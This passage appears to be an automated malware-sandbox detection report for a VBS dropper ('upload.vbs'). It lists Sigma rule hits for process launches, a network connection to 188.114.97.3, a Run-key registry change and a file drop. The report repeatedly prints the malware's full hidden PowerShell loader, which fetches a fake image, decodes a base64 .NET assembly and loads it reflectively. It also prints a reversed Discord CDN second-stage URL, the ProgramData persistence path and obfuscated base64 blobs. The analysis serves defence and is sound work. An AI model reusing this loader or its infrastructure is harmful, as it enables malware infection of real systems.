TreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDgDgTreNQDgTrevDgTreDcDgTreMgDgTrewDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDYDgTreMwDgTrewDgTreDcDgTreNgDgTrezDgTreDQDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTr
        Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('&821eca10697a0c67df2e67bef74e9882603857ea458ff959daac06cef1e0f42e=mh&de0d0566=si&d6222566=xe?txt.daolpu/2637891303159163421/3461911153207265321/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , '1' , 'C:\ProgramData\' , 'cognitivo','RegAsm',''))} }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMe
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDgDgTreNQDgTrevDgTreDcDgTreMgDgTrewDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDYDgTreMwDgTrewDgTreDcDgTreNgDgTrezDgTreDQDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTr
        Source: Network ConnectionAuthor: frack113, Florian Roth: Data: DestinationIp: 188.114.97.3, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 3628, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49704
        Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\upload.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\upload.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\upload.vbs", ProcessId: 3628, ProcessName: wscript.exe
        Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDgDgTreNQDgTrevDgTreDcDgTreMgDgTrewDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDYDgTreMwDgTrewDgTreDcDgTreNgDgTrezDgTreDQDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTr
        Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\ProgramData\cognitivo.vbs, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 1360, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Path
        Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7384, TargetFilename: C:\ProgramData\cognitivo.vbs
        Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 188.114.97.3, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 3628, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49704
        Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\cognitivo.vbs, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\cognitivo.vbs, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('&821eca10697a0c67df2e67bef74e9882603857ea458ff959daac06cef1e0f42e=mh&de0d0566=si&d6222566=xe?txt.daolpu/2637891303159163421/3461911153207265321/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , '1' , 'C:\ProgramData\' , 'cognitivo','RegAsm',''))} }", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 1360, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\cognitivo.vbs, ProcessId: 7384, ProcessName: powershell.exe
        Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('&821eca10697a0c67df2e67bef74e9882603857ea458ff959daac06cef1e0f42e=mh&de0d0566=si&d6222566=xe?txt.daolpu/2637891303159163421/3461911153207265321/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , '1' , 'C:\ProgramData\' , 'cognitivo','RegAsm',''))} }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMe
        Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('&821eca10697a0c67df2e67bef74e9882603857ea458ff959daac06cef1e0f42e=mh&de0d0566=si&d6222566=xe?txt.daolpu/2637891303159163421/3461911153207265321/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , '1' , 'C:\ProgramData\' , 'cognitivo','RegAsm',''))} }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMe
        Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\upload.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\upload.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\upload.vbs", ProcessId: 3628, ProcessName: wscript.exe
        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7D